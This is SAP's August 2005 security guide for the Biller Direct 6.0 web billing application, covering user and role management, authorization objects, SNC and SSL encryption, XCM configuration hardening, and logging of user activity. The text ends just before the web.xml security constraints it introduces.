Biller Direct Security

SAP Biller Direct Security Guide

Release 6.0

August 2005

SAP Biller Direct Security Guide 2

Copyright © Copyright 2004 SAP AG. All rights reserved. No part of this publication may be reproduced or transmitted in any form or for any purpose without the express permission of SAP AG. The information contained herein may be changed without prior notice. Some software products marketed by SAP AG and its distributors contain proprietary software components of other software vendors. Microsoft, Windows, Outlook, and PowerPoint are registered trademarks of Microsoft Corporation. IBM, DB2, DB2 Universal Database, OS/2, Parallel Sysplex, MVS/ESA, AIX, S/390, AS/400, OS/390, OS/400, iSeries, pSeries, xSeries, zSeries, z/OS, AFP, Intelligent Miner, WebSphere, Netfinity, Tivoli, and Informix are trademarks or registered trademarks of IBM Corporation in the United States and/or other countries. Oracle is a registered trademark of Oracle Corporation. UNIX, X/Open, OSF/1, and Motif are registered trademarks of the Open Group. Citrix, ICA, Program Neighborhood, MetaFrame, WinFrame, VideoFrame, and MultiWin are trademarks or registered trademarks of Citrix Systems, Inc. HTML, XML, XHTML and W3C are trademarks or registered trademarks of W3C®, World Wide Web Consortium, Massachusetts Institute of Technology. Java is a registered trademark of Sun Microsystems, Inc. JavaScript is a registered trademark of Sun Microsystems, Inc., used under license for technology invented and implemented by Netscape. MaxDB is a trademark of MySQL AB, Sweden. SAP, R/3, mySAP, mySAP.com, xApps, xApp, SAP NetWeaver, and other SAP products and services mentioned herein as well as their respective logos are trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world. All other product and service names mentioned are the trademarks of their respective companies. Data contained in this document serves informational purposes only. National product specifications may vary. These materials are subject to change without notice. These materials are provided by SAP AG and its affiliated companies ("SAP Group") for informational purposes only, without representation or warranty of any kind, and SAP Group shall not be liable for errors or omissions with respect to the materials. The only warranties for SAP Group products and services are those that are set forth in the express warranty statements accompanying such products and services, if any. Nothing herein should be construed as constituting an additional warranty.

August 2005


Icons in Body Text

Icon Meaning

Caution

Example

Note

Recommendation

Syntax

Additional icons are used in SAP Library documentation to help you identify different types of information at a glance. For more information, see Help on Help → General Information Classes and Information Classes for Business Information Warehouse on the first page of any version of SAP Library.

Typographic Conventions

Type Style Description

Example text Words or characters quoted from the screen. These include field names, screen titles, pushbuttons labels, menu names, menu paths, and menu options.

Cross-references to other documentation.

Example text Emphasized words or phrases in body text, graphic titles, and table titles.

EXAMPLE TEXT Technical names of system objects. These include report names, program names, transaction codes, table names, and key concepts of a programming language when they are surrounded by body text, for example, SELECT and INCLUDE.

Example text Output on the screen. This includes file and directory names and their paths, messages, names of variables and parameters, source text, and names of installation, upgrade and database tools.

Example text Exact user entry. These are words or characters that you enter in the system exactly as they appear in the documentation.

<Example text> Variable user entry. Angle brackets indicate that you replace these words and characters with appropriate entries to make entries in the system.

EXAMPLE TEXT Keys on the keyboard, for example, F2 or ENTER.

August 2005


SAP Biller Direct Security Guide ........................................................................................ 5 Security of SAP Biller Direct........................................................................................... 5 Architecture of SAP Biller Direct..................................................................................... 6 User Management and Authentication ............................................................................ 7

User Management and Authorizations......................................................................... 8

Authorization Objects and Example Roles .............................................................. 10

User Management Data in Customizing for the Web Application ................................. 12

Connection Between the Web Application and the Accounting System........................ 13

Authentication of the Web User ................................................................................. 14

Data Storage Security (Data Protection) ....................................................................... 14 Document Upload and SAP Virus Scan Interface....................................................... 14

User Data ................................................................................................................ 15

Editing Administrative Data ....................................................................................... 15

Logging the Activities of the User .............................................................................. 16

Communication ........................................................................................................... 17 HTTP and SSL......................................................................................................... 17

Configuring SNC for SAP Biller Direct........................................................................ 18

Secure Installation and Configuration............................................................................ 19 Secure Configuration of the J2EE Engine .................................................................. 19

Password ................................................................................................................ 19

Configuring Extended Configuration Management (XCM) Securely ............................. 19

XCM Application Configuration Data ...................................................................... 21

Protection with the Basic Authentication of the Servlet Engine ................................. 22

Reducing the Risk of Cross-Site Scripting Attacks ...................................................... 23

Secure Configuration of the Call Center Mode............................................................ 24

Hiding Scenarios...................................................................................................... 25

Transfer of Request Parameters ............................................................................... 25

August 2005


SAP Biller Direct Security Guide

Security of SAP Biller Direct

Introduction This Guide discusses aspects of SAP Biller Direct that affect data security, and describes the required measures for ensuring the security of SAP Biller Direct. There will occasionally be references to other Guides that provide detailed information on topics that cannot be discussed in depth here. Below you will find information on where these documents are located.

SAP Biller Direct is a JAVA-based Web application that enables customer accounts to be presented in a biller’s Internet portal. It enables customers to pay bills via the Internet, as well as enter inquiries and complaints. The biller deploys the Web application SAP Biller Direct and runs subledger accounting either in Accounts Receivable Accounting (FI-AR) or Contract Accounts Receivable and Payable (FI-CA).

Read first the Security Guide (SAP WAS Security Guide), which describes basic security aspects and measures for SAP systems.

You can also consult SAP Note 715371 SAP J2EE – Composite SAP Note on Security Basis 6.30/6.40.

Regarding the delivery of the source code of SAP Biller Direct 6.0, make sure you have read SAP Note 858563.

Further Information You can find the following documents on the SAP Biller Direct software CD or in the SAP Service Marketplace:

• SAP WAS Security Guide under service.sap.com/securityguide

• SNC User’s Guide or Cookbook: Configuring SNC for the AGate / SAP System Connect under service.sap.com/security and then Security in Detail → Secure System Management

• J2EE Security Guide under service.sap.com/securityguide

• Master Guide mySAP Financials under service.sap.com/ibc

• Installation Guide SAP Biller Direct 6.0 under service.sap.com/ibc

• Configuration Guide SAP Biller Direct 6.0 for Accounts Receivable Accounting (FI-AR) under service.sap.com/ibc

• Modification Guide SAP Biller Direct 6.0 for Accounts Receivable Accounting (FI-AR) under service.sap.com/ibc

• Configuration Guide SAP Biller Direct 6.0 for Contract Accounts Receivable and Payable (FI-CA) under service.sap.com/ibc

• Modification Guide SAP Biller Direct 6.0 for Contract Accounts Receivable and Payable (FI-CA) under service.sap.com/ibc

For additional current information on the secure configuration of SAP Biller Direct, see SAP Note 849511.

August 2005


Architecture of SAP Biller Direct

Use The following outline describes the processes involved and requirements that must be met to be able to operate the SAP Biller Direct application.

Prerequisites You are using Accounts Receivable Accounting (FI-AR) or Contract Accounts Receivable and Payable (FI-CA) for your subledger accounting.

Process The Web application runs on a Web server and is used as a front end for SAP Biller Direct. It visualizes the accounting data in the Internet and ensures communication between the front end and back end. The Web application consists of an application based on JavaServer Pages and Servlets.

The accounting system runs on a standard application server and is used as the back end for SAP Biller Direct. Data is transferred between the front end and the back end by means of RFC [Extern] and is ensured using the SAP Java Connector (JCo), which you install as a part of the SAP Middleware [Extern].

To enhance the Java 2 Standard Edition (J2SE) and to develop and operate company-specific applications, you need an SAP J2EE Engine [Extern] (SAP Java 2 Enterprise Edition Engine). With the Engine, SAP provides a complete application server that corresponds to the J2EE Specification 1.2.

The following figure shows the architecture of SAP Biller Direct.

For additional information on the architecture of a system landscape in an Internet scenario and the placing of firewalls, see the Security Guide to the J2EE Engine at the SAP Service Marketplace under the Internet address service.sap.com/securityguides → SAP Netweaver 04 Network Security Guides → Network Security for the SAP J2EE Engine → Using Multiple Network Zones.

SAP ApplicationServer

SAP Backend (FI-AR/CA)Browser

SAP Web ApplicationServer

SAP Biller Direct Front

End(Java)

JCo

Firewall

Firewall

WebServer

Bill Details

Display of Open ItemsHTTPS

HTTPS

Archive

Billing Application(e.g. SD, CRM

Billing)

RFC

RFC

RFC

UME (Java)

Security AreaInner DMZOuter DMZInternet

Firewall

RFC

RFC

HTTPS

HTTPS

SAP Business

ConnectorHTTP

August 2005


Secure Network Communications (SNC)

To ensure the transfer of data between the Web application and SAP system is secure, you should use Secure Network Communications (SNC). For detailed information on using SNC, see SAP Service Marketplace under the Internet address service.sap.com/security in the navigation bar on the right of the screen under Security in Detail → Secure System Management:

SNC User’s Guide

Cookbook: Configuring SNC for the AGate/SAP System Connect

Recommendations • For additional information on the secure architecture of the J2EE Engine (placing of

firewalls), see the Security Guide to the J2EE Engine.

• Configure the JCo RFC server only with SNC. Otherwise there is the possibility that other users are created via requests to the SAP system gateway (with other possible users as reference users).

• The SAP Business Connector communicates with the SAP J2EE Engine via HTTP. It is advisable to install the SAP Business Connector and the J2EE Engine on the same computer.

In Extended Configuration Management (XCM), in which you configure the Web application SAP Biller Direct for the connection to the SAP Business Connector , you should make the following entries:

¡ Host (localhost): 127.0.0.1 ¡ Port

For the port that you use, define in the administrator of the SAP Business Connector that it is only possible to call this up from your own server.

...

i. Edit the IP Access under Security → Ports.

ii. Choose Edit → Change IP Access Mode to Deny by Default.

Delete the proposed IPs from the list, and choose Add Host to Allow List and enter 127.0.0.1.

For additional information on configuring the Web application SAP Biller Direct with XCM, see the Configuration Guide for SAP Biller Direct under Business Customizing → Configuring the Web Application with the XCM.

You can find additional information on SAP Business Connector security in the Security Guide to the SAP Business Connector .

User Management and Authentication Use the SAP User Management Engine (UME) for the user management of Web users logging on via the Web front end.

Further Information You can find additional information on the UME in the SAP Help Portal under the Internet address help.sap.com under SAP NetWeaver → SAP Web Application Server. Having selected the relevant release and language, choose Administration Guide → Portal → System Administration → User Management Configuration.

For more information on user management, see the Configuration Guide for SAP Biller Direct under User Management.

August 2005


User Management and Authorizations

Features SAP Biller Direct has the following types of users:

• Web user

User who logs on in the Web browser and carries out activities there such as paying bills. You do not assign separate roles or authorization profiles to the Web user.

• Reference user

A user in the SAP system who is assigned to the Web user and to whom you assign the authorizations and roles required by the Web user in the SAP system. In the case of reference users, this always involves users who are created using transaction SU01 in the SAP back end, and have the attribute reference user. If you maintain Web users outside of the SAP back-end system, bear in mind that reference users do not contain pool user authorizations, but only authorizations for functions in the front end. This affects only authorizations for authorization object F_ACT_EBPP (if you are using FI-AR), and authorization object F_KK_EBPP (if you are using FI-CA).

• Pool user

The technical user through whom the data transfer is made. You process the pool user data with Extended Configuration Management (XCM).

¡ If you manage user data in an SAP system, the pool user is used for reading accesses to the accounting data in the SAP system. (Prerequisite: the parameter use_named_connections in XCM has the value yes.)

¡ If you manage user data outside the SAP system in which the accounting is found using a Lightweight Directory Access Protocol (LDAP) server or in a separate CRM system if you are using Customer Relationship Management (mySAP CRM), then the pool user is used for reading and writing accesses to the SAP system where the accounting data is stored. (Prerequisite: the parameter use_named_connections in XCM has the value no.)

User Management in the SAP System

To manage Web users who display and pay their bills using SAP Biller Direct, you have to make certain settings in the master data. You create the following types of master records for this:

• One user master record for each Web user

You assign a customer or business partner to this.

• Multiple reference user master records

For each authorization profile you need, you create a reference user master record and assign it an authorization profile. SAP delivers example roles that contain the necessary authorizations. For more information, see the Configuration Guides for SAP Biller Direct in the section User Management.

• One pool user master record

In this scenario, one user exists in the SAP system for each Web user. This user is logged in the change documents, so that you are able to trace back the changes to the individual Web users. (Prerequisite: the parameter use_named_connections in XCM has the value no.)

August 2005


User Management Outside the SAP System

If you manage users outside the SAP system in which the accounting is found, create the following types of users in the SAP system where the accounting is also found:

• A reference user master record for each authorization profile

• A pool user master record

This pool user is logged in the change documents, so that you are not able to trace back the changes to the individual Web users. To achieve that, use the log function. Further information on this is contained in the section Logging the Activities of the User.

Recommendation • Assign the authorizations exclusively to the reference user master records, and not

direct to the user master records of the individual Web users.

• Copy the example roles that are delivered, and check which authorizations are relevant to you. Adapt the copied roles. Proposed values that are dependent on the settings you define in Customizing are not delivered in the standard system. You need to adapt these as appropriate.

• Only give the pool user authorizations that are really necessary.

• The pool user must not have a trivial password. Assign a password with sufficient length, and consisting of both letters and numbers.

• Create Web users and pool users as communication users.

• Do not allow Web users direct access to the SAP system through RFC.

• If you manage user data outside of the SAP system (for example with an LDAP server), use the log function to trace and analyze the activities of individual Web users.

• The function modules that are in the following function groups access sensitive data. Consequently only grant authorizations to users who log on in the Internet for SAP Biller Direct.

¡ APAR_EBPP

¡ GEN_EBPP

¡ APAR_EBPP_CARDS

• Users having authorization ADM1 for authorization object F_ACT_EBPP or F_KK_EBPP can update the configuration of the Web application SAP Biller Direct on the J2EE-Engine using the URL. Do not grant this authorization to Web users.

Further Information Additional information on user management, authorizations and roles can be found in the Configuration Guide for SAP Biller Direct under User Management and under Business Customizing → Configuring the Web Application with XCM.

August 2005


Authorization Objects and Example Roles Authorization checks are made in the SAP system and in the J2EE Engine. Only the authorizations for authorization object F_ACT_EBPP (F_KK_EBPP) are checked in the J2EE Engine. Checks on the rest of the authorization objects (detailed below) are made in the SAP system. Authorization object F_ACT_EBPP (F_KK_EBPP) controls the specifically SAP Biller Direct authorizations. The authorizations for this authorization object are downloaded from the SAP system following successful authentication of the Web user, and checked before each of the Web user activities on the J2EE Engine.

Accounts Receivable Accounting (FI-AR):

All special functions for SAP Biller Direct are protected by authorization object F_ACT_EBPP.

In addition, the Web user authorizations are checked for the following authorization objects in the SAP system:

Object class AAAB:

• B_NOTIF

• S_RFC

Object class BC_A:

• S_SPO_DEV

• S_TABU_DIS

• S_USER_GRP

Object class BC_Z:

• S_BDS_DS

• S_OC_DOC

• S_OC_ROLE

• S_OC_SEND

Object class FI:

• F_ACT_EBPP

• F_BKPF_BUK

• F_BKPF_KOA

• F_KNA1_APP

• F_KNA1_BUK

• F_KNA1_GEN

• F_KNA1_GRP

• F_WEB_EBPP

Object class PM:

• I_QMEL

Object class SD:

• V_VBRK_FKA

• V_VBRK_VKO

You can assign roles with the appropriate authorizations or partial authorizations to the Web users. SAP delivers example roles that summarize the necessary authorizations. As these

August 2005


roles have generic authorizations, you have to copy these and adapt them for your requirements.

• SAP_FI_FSCM_BD_POOLUSER Contains all of the required authorizations for the pool user, if the user is only to have read access to the back end. In this case, you have to use named connections for the changing (write) accesses to the SAP system.

• SAP_FSCM_BD_AR_POOL_RW Contains all of the required authorizations for the pool user, if the user is to execute read and write access to the back end. You use this role when you do not have named connections.

• SAP_FI_FSCM_ALL Contains all of the authorizations that a user of SAP Biller Direct requires. Note that you must enter values for this role if the user is to be able to carry out functions such as partial payments or address changes.

You can find more example roles with transaction PFCG using the input help and search template *FSCM*.

Contract Accounts Receivable and Payable (FI-CA):

All special functions for SAP Biller Direct are protected in FI-CA by authorization object F_KK_EBPP. In addition, the Web user authorizations are checked for the following authorization objects in the SAP system:

Object class AAAB:

• B_ALE_MODL

• B_BUPA_FDG

• B_BUPA_RLT

• B_CCARD

• B_NOTIF

• S_RFC

Object class BPCT:

• B_PCONTACT

Object class FI:

• F_KKKO_BEG

• F_KKKO_BUK

• F_KKVK_BEG

• F_KKVK_BUK

• F_KKVK_VKT

• F_KK_AVIS

• F_KK_EBPP

Object class PM:

• I_QMEL

Object class BC_Z:

• S_BDS_DS

You can assign roles with the appropriate authorizations or partial authorizations to the Web users. SAP delivers example roles that summarize the necessary authorizations. As these

August 2005


roles have generic authorizations, you have to copy these and adapt them for your requirements. ...

• SAP_FI_FSCM_BD_POOL Contains all of the authorizations the pool user requires, if the user is only to have read access to the back end. In this case, you have to use named connections for the changing accesses to the SAP system.

• SAP_FSCM_BD_CA_POOL_RW Contains all of the required authorizations for the pool user, if the user is to execute read and write access to the back end. You use this role when you do not have named connections.

• SAP_FI_FSCM_ALL_BD Contains all of the authorizations that a user of SAP Biller Direct requires. Note that you must enter values for this role if the user is to be able to carry out functions such as partial payments or address changes.

You can find more example roles with transaction PFCG using the input help and search template *FSCM*. Proposed values that are dependent on the settings you have defined in Customizing are not delivered in the standard system. You need to adapt these as appropriate.

User Management Data in Customizing for the Web Application

Use User management covers the following SAP Biller Direct functions:

• Authentication of Web users

• Access to the assignment of the user to the business partner / customer in the back end or in the SAP User Management Engine (UME)

• Determination of the reference user for the user in the back end The reference user passes on his authorizations to the user.

You can manage the Web users either in FI-AR or in an external SAP system, such as CRM Internet Sales, or with the User Management Engine (for LDAP). You control the relationship between the Web application (front end) and the accounting system (back end) using the parameters of the component UserManagement of Extended Configuration Management (XCM). SAP delivers the following preconfigured scenarios:

• CRM_UserManagement

• FI_UserManagement

• UME_UserManagement

Prerequisites You have created the user master data in FI-AR, in an external SAP system, or in the SAP User Management Engine.

Further Information This can be found in the Configuration Guide for SAP Biller Direct under User Management and under Business Customizing → Configuring the Web Application with the XCM.

August 2005


Connection Between the Web Application and the Accounting System Prerequisites

• You have created a pool user in the SAP system.

• You have entered one or more connection pools (one pool for each language required) in Extended Configuration Management (XCM). In the Web application, texts that are read from the SAP system (for example, bill texts) are also presented. You can create a connection pool for each language in which a Web user logs on. If there is no connection pool for the language in which the Web user logs on, the default pool is used.

Features

The Web application and the accounting system (FI-CA or FI-AR) are connected via the SAP communication protocol Remote Function Call (RFC) using the SAP Java Connector (JCo). The following two connection types are used:

• Pooled connections

An RFC connection to the application server is not immediately disconnected when a user has logged off and it is no longer needed, but is stored in a pool of existing RFC connections and used again for the next access. Pooled connections are used by all users logged on at the same time. Consequently the Web users do not work under the user logged on, but under a pool user.

Information on authorization checks is contained in the Configuration Guide for SAP Biller Direct.

If you administer your user data outside of the SAP system in which your accounting is found (for example, with an LDAP server), then both reading and writing accesses are made using pooled connections. If you administer the user data within the SAP system in which your accounting is found, only reading accesses are made using pooled connections.(Prerequisite: the parameter use_named_connections in Extended Configuration Management (XCM) has the value yes.)

• Named connections

In this case access is made using an RFC connection under the user logged on (Named Connection). This named connection creates a separate RFC connection for each Web user; this connection only exists while the Web user is executing a process (for example, paying a bill). Afterwards the link is disconnected. This ensures that:

¡ All authorization checks are made for the user logged on

¡ All change documents for the user logged on are saved

¡ All user-specific system parameters access the values of the user logged on

If you administer the user data within the SAP system in which your accounting is found, writing accesses are made using named connections. (Prerequisite: the parameter use_named_connections in Extended Configuration Management (XCM) has the value yes.)

August 2005


Authentication of the Web User Use

Every Web user who displays and pays bills using SAP Biller Direct must be authenticated.

Features ...

1. Authentication for the Web application can be carried out in the following ways:

¡ The Web user enters his or her user name and password. The system then authenticates the user name and password against the user master you have created in FI-CA or FI-AR.

¡ A Single Sign-On ticket (SAP SSO2 ticket) is transferred. If a Web user has already logged on to a portal and calls up SAP Biller Direct in this portal, they do not have to log on again if this portal supports SAP SSO2 tickets. The portal system (for example, SAP Workplace) has already authenticated the Web user and retains the information about the authentication in the form of an X.509 certificate. The SAP User Management Engine (UME) evaluates this SSO2 ticket and allows the Web user access to SAP Biller Direct.

2. The business partner or customer that you have assigned in the user master record of a Web user is determined.

Data Storage Security (Data Protection)

Document Upload and SAP Virus Scan Interface If you are using SAP Biller Direct integrated with SAP Dispute Management and use the upload function in SAP Dispute Management, SAP strongly advises you to connect a suitable virus scanner via the virus scanner interface (VSI), as SAP Biller Direct does not undertake a virus scan. This interface is integrated in the upload function for documents. For additional information on this interface, see SAP Note 786179.

Further to this, note that SAP Biller Direct also does not perform the following functions:

• MIME type validation The system takes the MIME type of a document (that is appended to a dispute case) from the HTTP request and compares this with the permitted MIME type. In doing so, SAP Biller Direct does not check whether this MIME type is really the MIME type of the document. This check needs to be made in VSI, so as to prevent MIME type spoofing.

• Scripting in HTML files to be uploaded SAP Biller Direct does not itself make a check of scripting in uploaded files. This check must also be made in the VSI. If no check is made, then HTML files with JavaScript sections can be uploaded, for example, that are executed when you display them.

Make sure that these functions are also covered by the VSI.

August 2005


User Data Whenever the Web user accesses the Web application functions to make changes, for example, when credits are used to offset payments, the system notes the user data automatically in the change documents in the SAP system. Since this involves personal data you should check whether you are required by law to obtain the consent of the Web user before recording his or her data. For example, data protection legislation in Germany only permits the storage of personal data if the user has given express consent. This means that if the Web user does not consent to the recording of his data in the accounting system, you must ensure that it is not possible for him to carry out activities that would lead to a change in data.

Editing Administrative Data

Use Providing they have the necessary authorization, web users can:

• Request a user

• Change their address (new address, telephone, fax and e-mail address)

• Create, change or delete bank and credit card data

• Reset the password

• Request notification when a new bill or credit is posted

¡ Specify and change the type of notification (SMS, e-mail)

¡ Enter the address to which the notification should be sent, or else delete it

¡ Specify a notification period

¡ Request the creation of a paper bill in addition to the notification

Process When changes are made to the address, bank and payment card data in the Web application by the Web user, the Web application can

• Convert them to a general notification in the SAP system using an Internet service request (ISR), which an accounting clerk then checks and processes

You should note that in this case the transferred data is also stored in a general notification. (Examples would be credit card information or bank data.)

• Update them in the affected master data objects (customer) direct in the SAP system

If you decide in favor of the updating the changes direct in the SAP system, you should bear in mind that a change to the administrative data in the Web application automatically leads to a change in the master data objects in FI-AR. This means that a change in the address in the Web application automatically entails a change of address at the Customer. You must therefore check very carefully whether you want to allow, for example, the deletion of bank details in the Internet, especially if these bank details are still being used for other objects (customer account, items).

August 2005


If you are using Accounts Receivable Accounting and the dual control principle in FI-AR, you will be better able to monitor the consequences of such actions. You can find additional information about this in the SAP Help Portal in the Internet under help.sap.com in the SAP library under Accounting → Financial Accounting → Accounts Receivable → Accounts Receivable and Accounts Payable → Customer Master Data → Changing a Customer Master Record → Dual Control for Changing Master Records.

Changes to the modalities that affect the payment of bills, and registration of or change to a user in the Web application are updated direct in the corresponding master data object (for example, the contract partner) in the SAP system. If you wish to avoid changes being transferred unchecked into your SAP system, you can also create general notifications in the SAP system for changes of this kind using an ISR.

If a customer requests a user, the Web application always creates a general notification in the SAP system that is then processed by an accounting clerk.

Further Information For more information, see the configuration guides for SAP Biller Direct in the following sections:

• Requesting a User

• Changing and Deleting Administrative Data

• Initializing a Password

• Processing User Requests and Changes

• Adapting ISR Scenarios

Logging the Activities of the User

Use In FI-CA or FI-AR you can log and evaluate the activities of the Web user in SAP Biller Direct. Based on the logged data, you can obtain information such as:

• Whether the Web user has already seen a particular bill

• How often a Web user has logged on in the last month

• When a Web user last logged on

• Whether the Web user has created an inquiry for a bill

Prerequisites You cannot deactivate the log function for individual Web users. Since log entries involve personal data, you should check if you are required by law to obtain the consent of the Web user before logging his or her data. For example, in Germany, the storage of personal data is only permitted under the data protection legislation if the Web user has given consent. Consequently before you activate logging, you must ensure you have the agreement of all Web users.

Features The system records the data and groups it together in log categories. A log category in this regard corresponds to an action of a Web user. In contract accounts receivable and payable or accounts receivable accounting you can specify which categories you would like to log in

August 2005


Customizing. For a complete list of log categories available, see the input help for the field Log Category. The log entries are saved in FI-CA or FI-AR. However, only actions in the Web application are recorded. If a user displays a document directly in FI-CA or FI-AR, the system does not generate log entries. Employees of your company who display documents in call center mode generate entries with their own user ID.

You can configure SAP Biller Direct for the connection to the SAP system as follows:

• Reading accesses are made via pooled connections. Writing accesses are made via named connections. (You manage the users in the accounting system.)

For each Web user there is a user master record in the accounting system. Writing activities carried out by Web users are logged in change documents, and can be traced back to the individual Web user.

Changes to authorization management are also logged in the accounting system.

• Reading and writing accesses are made via pooled connections. (You manage the users with an LDAP server or in a CRM system.)

For all Web users there is only a pool user master record in the accounting system. Writing activities carried out by Web users are logged in change documents, and can be traced back to the pool user.

If you want to trace the activities of an individual Web user, use the function Logging the Activities of the Web User.

If the assignment of the reference user to the user is important so that you are able to follow up the changes of individual users, set a high trace level in the SAP User Management Engine (UME). A high trace level can be detrimental to system performance. The reference user is stored in the free attributes for a Web user.

Recommendation If you definitely want to trace changes, you are advised to manage users in the accounting system, and to use named connections for writing accesses.

You are recommended to save the lists of logging reports as a file, as they may contain required documentary evidence.

Further Information For additional information, see the Configuration Guide for SAP Biller Direct under Business Customizing → Logging the Activities of the Web User.

Communication

HTTP and SSL The data exchanged between the browser and the Web server is encrypted with HTTPS. SAP strongly advises you to operate SAP Biller Direct with SSL encryption under HTTPS, and not to enable access to SAP Biller Direct via the http protocol. For more information on SSL encryption, see the SAP J2EE Engine SSL Installation Guide on the software CD.

August 2005


Configuring SNC for SAP Biller Direct

Use The data exchanged between the Web server and the SAP system is encrypted with SNC. For more information on SNC, see the SNC User’s Guide.

Procedure • Settings in Extended Configuration Management (XCM)

In the Connection Manager component, choose snc_server_connect or snc_group_connect as the basic configuration. Edit the following parameters:

¡ SNC_PARTNERNAME (SNC name of SAP system)

¡ SNC_MYNAME (SNC name of the J2EE Engine)

¡ SNC_MODE 1

¡ SNC_LIB (path and file of external security library)

¡ SNC_QOP 3 (quality of the SNC connection)

If authentication is through CRM, you must also specify the SNC parameters for the connection to the CRM system in the component CRMconnection in a similar way.

If you are using a JCo-RFC server for communication between the SAP system and SAP Biller Direct (only necessary for passive enrollment), then choose snc_authentication as the basic configuration for the JCo-RFC server. Edit the SNC parameters in the same way as those in the component ConnectionManager

Only ever operate the JCo-RFC server with one SNC connection. SAP Biller Direct will then be able to check whether the SNC caller name matches the SNC_PARTNERNAME that you entered in XCM. If the SNC names do not match, access is denied. Without an SNC connection such a check is not possible and the JCo-RFC server can be called up without authentication.

• Settings in the SAP System

For additional information on the entries for the functions below, see the Configuration Guide for SNC.

¡ Table USRACL (from the screen SAP Easy Access, choose Tools → Administration → User Maintenance → Users → Change; Tab page SNC, field SNC name)

Assign to the pool user the SNC name of the user under which the application runs on the Web server. Do not assign this SNC name to any other user.

For security reasons, do not assign this SNC name to any other user.

¡ Table USRACLEXT

Save the following additional entry:

User name: *, SNC name: SNC name of pool user

The pool user in the SAP system should be of the type communication user.

August 2005


Secure Installation and Configuration To learn how to install SAP Biller Direct, see the Installation Guide. There you will also find information on the secure installation of SAP Biller Direct.

Secure Configuration of the J2EE Engine You can find information on the secure configuration of the J2EE Engine in the Security Guide on the SAP Service Marketplace under service.sap.com/securityguide in the navigation bar on the right half of the screen under Security in Detail → Hot Topic: J2EE.

You can also consult SAP Note 715371 SAP J2EE – Composite SAP Note on Security Basis 6.30/6.40.

Furthermore, make sure that all contents of the J2EE engine you do not require have been deactivated or stopped in your production system. Information on which contents and services in your engine are absolutely necessary to operate it and which you can deactivate can be found in SAP Note 781882.

Password You can send an e-mail or a letter to future Web users with a new password they can use to log on to SAP Biller Direct. E-mails, however, are not a secure communication method. It is possible for unauthorized parties to read the content of an e-mail.

Recommendation

To make sure that the password is read only by the user for whom it is intended, you should send the password in a letter.

Further Information

For more information on sending logon data, see the Configuration Guide for SAP Biller Direct under Sending Customer Messages [Extern] and Processing User Requests and Changes [Extern].

Configuring Extended Configuration Management (XCM) Securely

Use You configure the Web application SAP Biller Direct with the Web application Extended Configuration Management (XCM). For additional information, visit the SAP Service Marketplace under service.sap.com/CRM-INST → Installation & Upgrade Guides → CRM Web Application Guide SP03.

To prevent the configuration data being accessed via the Internet or otherwise changed, the following options are available to protect both the configuration itself and access to it:

August 2005


• You can configure SAP Biller Direct in such a way that only one user in the role of administrator and authenticated with a password can access XCM.

• You can deny access to XCM by external users.

SAP Note 675049 describes how you can prevent external users from being able to access XCM.

• You can deactivate XCM in productive operation.

In XCM you can hide the functions (such as Balance Confirmation, Display Open Items) that you use with SAP Biller Direct:

Note the following points relating to authorization:

• If you have shown a function in XCM (meaning this function is available for input the menu bar) but the user does not have authorization to execute it, he or she will not be able to call it up.

• If you have hidden a function in XCM (meaning this function is not available for input the menu bar) but the user does in fact have authorization to execute it, he or she may be able to access the function by a different route.

Restrict Access to One User with the Role Administrator The standard delivery of SAP Biller Direct already provides for access to be restricted to an administrator. (Read Protection using the basic authentication of the Servlet Engine [Seite 22]). The role bdadmin is automatically assigned to the administrator in the SAP J2EE Engine. You also have the option of assigning the role bdadmin to a different user. To do this, proceed as follows:

1. Start the J2EE Administrator.

2. After Connect choose Services → Security Provider.

3. Under Policy Configuration choose

¡ Component sap.com/com.sap.fin.ebpp*bd

¡ Authentication template Basic

4. Choose Security Roles

¡ Add role bdadmin

¡ User Mapping Assign User

If you do not want the administrator to be able to access XCM, then remove the role bdadmin from the user “Administrator”, and reassign the role bdadmin to the user who is allowed access to XCM.

For additional information on this, visit the SAP Help Portal under help.sap.com under SAP NetWeaver. Select your language and release, and then choose SAP Application Platform → Java Technology in SAP Web Application Server.

August 2005


Deactivate in Productive Operation To deactivate XCM in productive operation, leave the parameter <param-value> in file web.xml empty, that is, delete xcmadmin.

File web.xml (Deployment Descriptor of the application):

<context-param>

<param-name>adminconfig.core.isa.sapmarkets.com</param-name> <param-value>xcmadmin</param-value> <description>Controls which features are available in the ISA Administration Area. If you want to prevent access to the Administration Area clear the content of this parameter. The available features for this application are: 'sat, xcmadmin, isacorecache, catalogcache, corecache, jcoinfo, logging, version, loggingfiledownload, appinfo, ccmsheartbeat'

</description> </context-param>

File web.xml (Deployment Descriptor of the application with deactivated XCM):

<context-param>

<param-name>adminconfig.core.isa.sapmarkets.com</param-name> <param-value></param-value> <description>Controls which features are available in the ISA Administration Area. If you want to prevent access to the Administration Area clear the content of this parameter. The available features for this application are: 'sat, xcmadmin, isacorecache, catalogcache, corecache, jcoinfo, logging, version, loggingfiledownload, appinfo, ccmsheartbeat'

</description> </context-param>

Recommendation You are recommended to deactivate XCM in productive operation.

XCM Application Configuration Data You configure SAP Biller Direct using XCM. The local SAP NetWeaver AS Java database saves the customer settings. Some of the data, such as the password, is encrypted by J2EE Engine Services Secure Storage before being stored in the database. Sensitive XCM data is only securely encrypted if you have installed the SAP Java Cryptographic Toolkit. SAP strongly advises you therefore to install the Cryptographic Toolkit. If you have not installed the Cryptographic Toolkit, the data is only encoded by using Base64 encoding. For information on how you can install the Cryptographic Toolkit, see the Security Guide for SAP NetWeaver in the SAP Service Marketplace under securityguide (see Deploying the SAP Java Cryptographic Toolkit). If you transport (copy) XCM configuration data from one J2EE Engine to another, you must also copy the key that is required for the encryption.

August 2005


Using the Key Storage Provider Service of the J2EE Engine, you can copy the Secure Storage key as follows: ...

1. Log on to the J2EE Engine from which the key is to be copied.

2. Select Key Storage Service.

3. As it is only possible to export complete views, you need to create a temporary view to export the key. For example, create the new view xcmkeycopy.

4. Choose Import from other to import the required key from the Secure Storage View to the view that you have created. Each Web application has a separate key. Choose the key of the Web application whose XCM data you want to transfer.

5. Save view xcmkeycopy in a file.

6. Log on to the J2EE Engine to which you want to import the key, and choose Key Storage Service.

7. Import the view saved in the file to the Secure Storage View.

Protection with the Basic Authentication of the Servlet Engine Access to the resources of XCM is restricted using security-constraints in the deployment descriptor of the Web application SAP Biller Direct File web.xml contains the following security-constraints:

